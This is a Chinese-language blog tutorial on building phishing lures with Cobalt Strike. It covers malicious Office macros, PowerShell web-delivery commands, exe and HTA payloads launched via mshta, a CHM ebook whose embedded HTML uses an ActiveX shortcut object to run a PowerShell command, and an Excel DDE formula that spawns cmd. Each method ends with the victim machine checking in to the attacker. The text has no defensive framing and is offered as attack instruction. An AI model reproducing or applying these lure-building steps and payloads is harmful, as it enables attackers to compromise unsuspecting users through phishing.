当前位置: 首页 > news >正文

钓鱼鱼饵制作的方式

一、.Office 钓鱼攻击

启动我们的服务端和客户端,详情查看

cs的搭建和使用-CSDN博客

然后在我们的客户端的有效载荷中选择office宏

选择我们的监听器

生成之后复制我们的宏代码

这里需要注意的是需要使用word文档,不能使用wps word文档,而且要在信任中心打开我们的所有宏

接下来在菜单栏中选择视图中的宏,点击查看宏

为当前文档创建一个宏

将我们刚刚生成的宏代码复制进去

保存下来,它会提示我们如下内容,我们选择是

再次点击word文档,发现我们监听成功

二、lnk 快捷方式钓鱼

选择攻击中的web投递

类型选择为powershell,监听器选择当前的监听器

运行,他会给我们一段命令

我们去运行一下这个命令

发现上线成功

三、powershell

选择有效载荷中的payload生成器

输出格式选择powershell command

点击生成之后,他会给我们生成一个txt文件

我们查看一下内容,发现是一大段命令

我们去执行一下

发现上线成功

四、exe

选择有效载荷中的Windows可执行程序

选择我们的监听地址,创建一个exe文件

将这个exe文件创建下来,在我们的电脑中就可以看到我们刚刚创建的这个exe文件

我们运行一下,可以看到监听到了我们的电脑

五、mshta上线

选择有效载荷中的HTA文档

类型选择poweishell

生成后发现我们的电脑中多了一个hta文件

然后点击站点管理中的文件托管

文件选择刚刚生成的hta文件,其余不变

运行之后,他给了我们一个地址

然后我们在我们的电脑中运行如下命令

mshta 你自己的链接

上线成功

六、chm电子书钓鱼

下载地址:https://www.zipghost.com/download/easychm/echmsetup.exe

选择攻击中的web投递

按照之前的操作生成一个命令

创建一个html文件,将下述代码写入其中,并替换其中的命令,并在powershell.exe后加逗号

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=",你自己生成的命令><PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

修改后如下

创建一个新的文件夹 里面创建两个文件夹,并将我们刚刚创建的html文件添加进去

在chm中新建一个目录,地址选择我们刚刚创建的总文件夹

点击编译,生成

会发现我们的电脑中多了如下文件

双击运行,发现上线成功

七、execl

打开office外部内容中的启用动态数据交换服务器启动功能

构造一个恶意载荷

=1+cmd|' /C calc'!A0

输入到表格的随便一格中去,保存发现被执行了

http://www.lryc.cn/news/617534.html

相关文章:

  • Go 多进程编程-同步
  • 免费好用的数字人API
  • synchronized 、volatile 以及 ReentrantLockReentrantLock 的区别
  • monorepo架构设计方案
  • 小白入门指南:Edge SCDN 轻松上手
  • 【NOI】落谷2025/08/10 SCP-J 模拟测试 第10题 求构成三角形的概率
  • qss基础
  • Godot ------ 平滑拖动02
  • 机器学习第九课之DBSCAN算法
  • 智慧工地:以三大监测技术筑牢安全屏障
  • (Arxiv-2025)Phantom-Data:迈向通用的主体一致性视频生成数据集
  • Qwen 3 架构深度解析:混合推理、MoE创新与开源生态的全面突破
  • 工业智造新引擎:BRAV-7135赋能自动化产线升级
  • 第八篇:交互入门:鼠标拾取物体
  • 可视化+自动化:招聘管理看板软件的核心技术架构解析
  • 网络资源模板--基于Android Studio 实现的手绘板App
  • Docker部署MySQL完整指南:从入门到实践
  • Oracle主从incarnation不一致问题解决
  • 如何网络“钓鱼”,钓鱼鱼饵生成工具CobaltStrike使用
  • 云原生应用的DevOps2(Jenkins渗透场景)
  • 【从零开始java学习|第一篇】java中的名词概念(JDK、JVM、JRE等等)
  • JVM 运行时全景:从类加载到 GC 的底层原理与调优指南
  • 在Mac 上生成GitLab 的SSH 密钥并将其添加到GitLab
  • Empire--安装、使用
  • 【12-激活函数】
  • 类和对象(中上)
  • 腾讯 iOA 测评 | 横向移动检测、病毒查杀、外设管控、部署性能
  • 运维学习Day21——LAMP/LNMP 最佳实践
  • react+vite-plugin-react-router-generator自动化生成路由
  • 论文阅读 arxiv 2024 MemGPT: Towards LLMs as Operating Systems